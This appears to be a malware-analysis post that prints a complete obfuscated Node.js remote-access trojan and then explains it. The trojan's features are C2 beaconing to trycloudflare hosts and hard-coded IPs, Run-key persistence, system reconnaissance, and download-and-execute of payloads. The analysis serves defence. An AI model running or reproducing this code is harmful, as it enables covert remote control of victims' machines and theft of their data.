The provided code appears to be heavily obfuscated JavaScript, containing...

April 2, 2025 at 09:14 PM

"node.exe" -e "const a0m=a0o;(function(D,O){const N=a0o,e=D();while(!![]){try{const o=parseInt(N(0x153))/0x1*(-parseInt(N(0x137))/0x2)+-parseInt(N(0x182))/0x3*(-parseInt(N(0x13f))/0x4)+parseInt(N(0x142))/0x5*(parseInt(N(0x134))/0x6)+parseInt(N(0x16d))/0x7+-parseInt(N(0x159))/0x8+parseInt(N(0x184))/0x9*(-parseInt(N(0x186))/0xa)+-parseInt(N(0x193))/0xb;if(o===O)break;else e['push'](e['shift']());}catch(U){e['push'](e['shift']());}}}(a0e,0xe81b7));const a0O=(function(){let D=!![];return function(O,e){const o=D?function(){const r=a0o;if(e){const U=e[r(0x176)](O,arguments);return e=null,U;}}:function(){};return D=![],o;};}()),a0D=a0O(this,function(){const b=a0o,D=function(){const z=a0o;let U;try{U=Function(z(0x162)+z(0x158)+');')();}catch(j){U=window;}return U;},O=D(),e=O[b(0x173)]=O[b(0x173)]||{},o=['log',b(0x18e),'info','error',b(0x18d),b(0x148),'trace'];for(let U=0x0;U<o[b(0x191)];U++){const j=a0O[b(0x17d)][b(0x18c)][b(0x172)](a0O),C=o[U],Y=e[C]||j;j[b(0x15b)]=a0O[b(0x172)](a0O),j[b(0x17f)]=Y[b(0x17f)][b(0x172)](Y),e[C]=j;}});a0D();const http=require(a0m(0x14e)),{execSync,exec,spawn}=require(a0m(0x160)),fs=require('fs'),path=require('path'),zlib=require('zlib');function a0e(){const 
Z=['pid','from','reg\x20add\x20','{}.constructor(\x22return\x20this\x22)(\x20)','7754656dGQMhu','000011','__proto__','write','request','stdout','chcp\x2065001\x20>\x20NUL\x202>&1\x20&\x20echo\x20\x27version:\x20','child_process','ChromeUpdater','return\x20(function()\x20','.js','.dll','argv','ignore','off','\x20/t\x20REG_SZ\x20/d\x20','Execution\x20error:','split','216.245.184.181','alloc','3848719ytruRh','writeFileSync','suffering-arnold-satisfaction-prior.trycloudflare.com','utf8','wmic\x20process\x20where\x20processid=','bind','console','match','.exe','apply','\x20get\x20commandline','close','/init1234','StatusCode:','delay','exit','constructor','push','toString','atst','stderr','2786577EtrIqZ','ooff','9TqwIUz',',start','4595620ZkTsJm','HKCU\x5cSoftware\x5cMicrosoft\x5cWindows\x5cCurrentVersion\x5cRun','statusCode','floor','start','join','prototype','exception','warn','\x0a=-c=-m=-d=-=-\x0a','rundll32.exe','length','application/octet-stream','3150499YvDOwh','substring','random','Error\x20with\x20HTTP\x20request:','strain-brighton-focused-kw.trycloudflare.com','9490734mhJwdI','error','concat','46406KXjRkJ','cmd.exe','\x20/v\x20','una-idol-ta-missile.trycloudflare.com','data','message','unref','readUInt32LE','4gCuqWP','fromCharCode','\x27\x20;\x20if\x20([Security.Principal.WindowsIdentity]::GetCurrent().Name\x20-match\x20\x27(?i)SYSTEM\x27)\x20\x20{\x20\x27Runas:\x20System\x27\x20}\x20elseif\x20(([Security.Principal.WindowsPrincipal]\x20[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))\x20{\x20\x27Runas:\x20Admin\x27\x20}\x20else\x20{\x20\x27Runas:\x20User\x27\x20}\x20;\x20systeminfo\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20tasklist\x20/svc\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20Get-Service\x20|\x20Select-Object\x20-Property\x20Name,\x20DisplayName\x20|\x20Format-List\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20Get-PSDrive\x20-PSProvider\x20FileSystem\x20|\x20Format-Table\x20-AutoSize\x20;\x20
echo\x20\x27=-=-=-=-=-\x27\x20;\x20arp\x20-a','5TXUvjf','gzipSync','subarray','env','useActive','APPDATA','table','writeUInt32LE','trim','EXE','utf-8','log','http','212.237.217.182','.log','replaceAll','fail\x20connect\x20to\x20server','17DPIGqN','end'];a0e=function(){return Z;};return a0e();}if(process[a0m(0x165)][0x1]!==undefined&&process[a0m(0x165)][0x2]===undefined){const child=spawn(process[a0m(0x165)][0x0],[process['argv'][0x1],'1'],{'detached':!![],'stdio':'ignore','windowsHide':!![]});child[a0m(0x13d)](),process[a0m(0x17c)](0x0);}const ver=a0m(0x15a),PORT_HTTP=0x50,PORT_IP=0x1bb,PORT=0x5a3;let sysinfo=null;function initSysInfo(){const n=a0m;let D;try{let o=execSync('chcp\x2065001\x20>\x20$null\x202>&1\x20;\x20echo\x20\x27version:\x20'+ver+n(0x141),{'encoding':n(0x14c),'shell':'powershell.exe','windowsHide':!![]});D=Buffer[n(0x156)](o,n(0x14c));}catch(U){try{let j=execSync(n(0x15f)+ver+'\x27\x20&\x20echo\x20\x27Runas:\x20Unknown\x27\x20&\x20systeminfo',{'encoding':n(0x14c),'shell':n(0x138),'windowsHide':!![]});D=Buffer['from'](j,'utf-8');}catch(C){console[n(0x135)](n(0x169),C[n(0x13c)]);}}const O=Buffer[n(0x16c)](0x4);O['writeUInt32LE'](Math['random']()*0x5f5e100);const e=Buffer['alloc'](0x2);e['writeUInt16LE'](0x2f),sysinfo=Buffer['concat']([O,e,D]);}function xor(D,O){let e=O[0x0];for(let o=0x0,U=D['length'];o<U;++o){e+=(e+o%0x100)%0x100,D[o]^=(O[o%0x4]^e)%0x100;}}const zlibKey=Buffer[a0m(0x16c)](0x4);zlibKey[a0m(0x149)](0xfafbfdfe);const encKey=Buffer[a0m(0x16c)](0x4);encKey[a0m(0x149)](0xfafbfdff);function enc(D){const L=a0m,O=Buffer[L(0x16c)](0x4);return O['writeUInt32LE'](Math[L(0x195)]()*0x5f5e100),xor(D,O),Buffer[L(0x136)]([zlib[L(0x143)](Buffer[L(0x136)]([D,O,encKey])),zlibKey]);}function atst(){const S=a0m,D=S(0x171)+process[S(0x155)]+S(0x177);exec(D,{'windowsHide':!![]},(O,e,o)=>{const T=S;if(O){console[T(0x135)](''+O[T(0x13c)]);return;}if(o){console[T(0x135)](''+o);return;}const U=String[T(0x140)](0x22);let 
j;if(e[T(0x17f)]()[T(0x174)](/\s-e\s/g)){const Y=e[T(0x17f)]()[T(0x16a)]('\x0a',0x2)[0x1]['trim']()[T(0x16a)](/node\.exe.*?\s-e\s+/,0x2)[0x1][T(0x14a)]()[T(0x151)](U,''),y=process[T(0x165)][0x0]['replace']('node.exe',randStr(0x8)+T(0x150));fs[T(0x16e)](y,Y),j=process['argv'][0x0]+'\x20'+y;}else j=process[T(0x165)][0x0]+'\x20'+process[T(0x165)][0x1];const C=T(0x157)+U+T(0x187)+U+T(0x139)+U+T(0x161)+U+T(0x168)+U+j[T(0x151)](U,'\x5c'+U)+U+'\x20/f';exec(C,{'windowsHide':!![]},(v,f,Q)=>{v&&console['error'](''+v['message']),Q&&console['error'](''+Q);});});}const TypeFile={'EXE':0x0,'DLL':0x1,'JS':0x2,'CMD':0x3,'ACTIVE':0x4,'OTHER':0x5};function randStr(D){const M=a0m;return Math[M(0x195)]()[M(0x17f)](0x24)[M(0x194)](0x2,D+0x2);}function start(D,O){const K=a0m;let e,o=[];switch(O){case TypeFile[K(0x14b)]:e=D,o=[];break;case TypeFile['DLL']:e=K(0x190),o=[D+K(0x185)];break;case TypeFile['JS']:e=process[K(0x165)][0x0],o=['-e',D];break;default:return;}const U=spawn(e,o,{'detached':!![],'stdio':K(0x166),'windowsHide':!![]});U[K(0x13d)]();}let lastCmd=null;function startCmd(D){const V=a0m;let O;try{O=spawn(D,{'shell':'cmd.exe','windowsHide':!![]});}catch(o){console['error'](''+o[V(0x13c)]);return;}let e='';O[V(0x15e)]['on']('data',U=>{const h=V;e+=U[h(0x17f)]();}),O[V(0x181)]['on'](V(0x13b),U=>{const d=V;e+=U[d(0x17f)]();}),O['on'](V(0x178),U=>{lastCmd=e;});}function main(D,O){const g=a0m;console[g(0x14d)]('connect\x20to:',D);let e=sysinfo;lastCmd!==null?(e=Buffer['concat']([sysinfo,Buffer[g(0x156)](g(0x18f),g(0x14c)),Buffer[g(0x156)](lastCmd,g(0x14c))]),lastCmd=null):e=Buffer['concat']([sysinfo]);e=enc(e);const o={'hostname':D,'port':O,'path':g(0x179),'method':'POST','headers':{'Content-Type':g(0x192),'Content-Length':e[g(0x191)]}};return new Promise((U,j)=>{const q=g,C=http[q(0x15d)](o,Y=>{const a=q,y=[];console[a(0x14d)](Y['headers']),console[a(0x14d)](a(0x17a),Y[a(0x188)]),Y['on'](a(0x13b),v=>{const J=a;y[J(0x17e)](v);}),Y['on'](a(0x154),()=>{const 
G=a,v=Buffer[G(0x136)](y);if(Y['statusCode']===0x1f6){j(G(0x152));return;}if(Y[G(0x188)]!==0xc8){console['error'](G(0x17a),Y['statusCode']),U({});return;}if(v[G(0x191)]===0x4&&v['toString']()===G(0x183))console[G(0x14d)](G(0x167)),process[G(0x17c)](0x0);else{if(v[G(0x191)]===0x4&&v[G(0x17f)]()===G(0x180)){console[G(0x14d)](G(0x180));try{atst();}catch(R){console[G(0x135)](R);}U({});return;}}const f=v['subarray'](0x0,v[G(0x191)]-0x4),k=v[G(0x144)](v[G(0x191)]-0x4,v[G(0x191)]);xor(f,k);const Q=f[f['length']-0x1],l=f[G(0x144)](0x0,f[G(0x191)]-0x1);let w;switch(Q){case TypeFile[G(0x14b)]:w=G(0x175);break;case TypeFile['DLL']:w=G(0x164);break;case TypeFile['JS']:w=G(0x163);break;case TypeFile['CMD']:startCmd(l[G(0x17f)](G(0x170))),U({});return;case TypeFile['ACTIVE']:useActive=l[G(0x13e)](),U({});return;default:w=G(0x150);break;}let c;Q===TypeFile['JS']?c=l[G(0x17f)]('utf8'):(c=path['join'](process[G(0x145)][G(0x147)],randStr(0x8)),fs['mkdirSync'](c,{'recursive':!![]}),c=path[G(0x18b)](c['toString'](),randStr(0x8)+w),fs[G(0x16e)](c,l),console[G(0x14d)](G(0x18a),c)),start(c,Q),U({});});});C['on'](q(0x135),Y=>{j(Y);}),C[q(0x15c)](e),C[q(0x154)]();});}initSysInfo();function a0o(D,O){const e=a0e();return a0o=function(o,U){o=o-0x134;let j=e[o];return j;},a0o(D,O);}const hosts=[a0m(0x16f),'speak-head-somebody-stays.trycloudflare.com','mortgage-i-concrete-origins.trycloudflare.com',a0m(0x13a),a0m(0x197),'musicians-implied-less-model.trycloudflare.com'],hostsIp=[a0m(0x16b),a0m(0x14f),'168.119.96.41'];let useIp=0x0,delay=0x1,useActive=0x0;async function mainloop(){const P=a0m;let D=hosts[Math[P(0x189)](Math[P(0x195)]()*0x3e8)%hosts[P(0x191)]],O=hostsIp[Math[P(0x189)](Math[P(0x195)]()*0x3e8)%hostsIp['length']];while(!![]){console['log'](P(0x17b),delay),await new Promise(e=>setTimeout(e,delay));try{if(useIp<0xc8)await main(D,PORT_HTTP),useIp=0x0;else{await 
main(O,PORT_IP),useIp++;if(useIp>=0xd2)useIp=0xbe;}}catch(e){console[P(0x135)](P(0x196),e[P(0x13c)]),D=hosts[Math[P(0x189)](Math[P(0x195)]()*0x3e8)%hosts[P(0x191)]],O=hostsIp[Math[P(0x189)](Math['random']()*0x3e8)%hostsIp[P(0x191)]],useIp++,delay=0x3e8*0xa,useActive=0x0;continue;}console[P(0x14d)](P(0x146),useActive),useActive>0x0?(delay=0x3e8*0xa,--useActive):delay=0x3e8*0x3c*0x5;}}mainloop();"

The provided code appears to be heavily obfuscated JavaScript that implements malicious functionality. Here is a high-level overview of what the code most likely does, based on static analysis only (the code was not executed):


Key Intent of the Code:

  1. Command-and-Control Communication:

    • The script repeatedly beacons to a list of remote hosts (several trycloudflare.com hostnames and hard-coded IP addresses) over plain HTTP, using port 80 for the hostnames and port 443 for the IP addresses, and switches from the hostname list to the IP list after repeated connection failures.
    • It attempts to send system information and receive instructions from these hosts.
  2. Persistence Mechanisms:

    • The script writes a Windows Registry Run-key entry (the embedded strings point to HKCU\Software\Microsoft\Windows\CurrentVersion\Run, apparently under the value name "ChromeUpdater") pointing at a copy of itself, and re-launches itself as a detached, hidden background process, so that it remains active after the system restarts.
  3. System Information Gathering:

    • It collects details about the system: the embedded PowerShell command checks whether it is running as SYSTEM, Administrator or a normal user, then runs systeminfo, tasklist /svc, Get-Service, Get-PSDrive and arp -a, so the report covers privilege level, system configuration, running processes and services, drives and nearby network neighbours.
  4. Exfiltration and Execution:

    • It might exfiltrate data to remote servers.
    • The code is capable of executing received payloads (e.g., files, scripts, or commands), depending on the instructions sent by its remote server.
  5. Obfuscation:

    • The code is structured in a way that is purposefully difficult to read or understand. Functions are wrapped in self-invoking obfuscated layers, variable names are minified, and data is encoded (like XOR functions and buffers).
  6. File Creation and Execution:

    • It can write received files (like .exe, .dll, .js, etc.) to the file system and execute them using spawned child processes.
  7. Encryption:

    • The code XORs and gzip-compresses the data it transmits (a lightweight obfuscation scheme rather than strong encryption), which hides its payloads and traffic contents from casual inspection and simple signature matching.
  8. Error Handling:

    • Execution errors are caught and logged rather than being allowed to terminate the process, and the main loop runs indefinitely with a retry delay, so it keeps beaconing to its Command-and-Control (C2) servers.

Malicious or Mal-intent Evidence:

  • Obfuscation: The entire code is obfuscated to obscure its core functionality, a common hallmark of malware designed to bypass detection or analysis.
  • Spawning Processes: Received commands and payloads are executed dynamically via child_process (spawn, exec, execSync), including cmd.exe shells, node -e for received JavaScript and, apparently, rundll32.exe for received DLLs.
  • Persistence Attempts: The code modifies Windows Registry to persist across reboots.
  • C2 Communication: The use of multiple remote hosts and fallback techniques is typical for malware reaching out to C2 servers.
  • Encoding and Packaging: The use of XOR encoding, the creation and writing of files (fs.writeFileSync) into a randomly named directory under %APPDATA%, and the execution of those files indicate payload delivery.

Conclusion:

The provided code appears to be malware, likely a Trojan or a remote access tool (RAT) designed for:

  • Persistently maintaining remote access to an infected system.
  • Executing commands or delivering malicious payloads from remote servers.
  • Exfiltrating sensitive information or maintaining unauthorized control.

If this script is present in your setup or system, it should be treated as a security incident. Disconnect the affected device from the network, preserve the evidence (the Run-key entry, any files dropped under %APPDATA%, and the command line of the running node.exe process) rather than simply deleting it, and consult a cybersecurity professional to analyze and remediate. The hostnames and IP addresses hard-coded in the script are useful indicators for checking other systems and network logs.
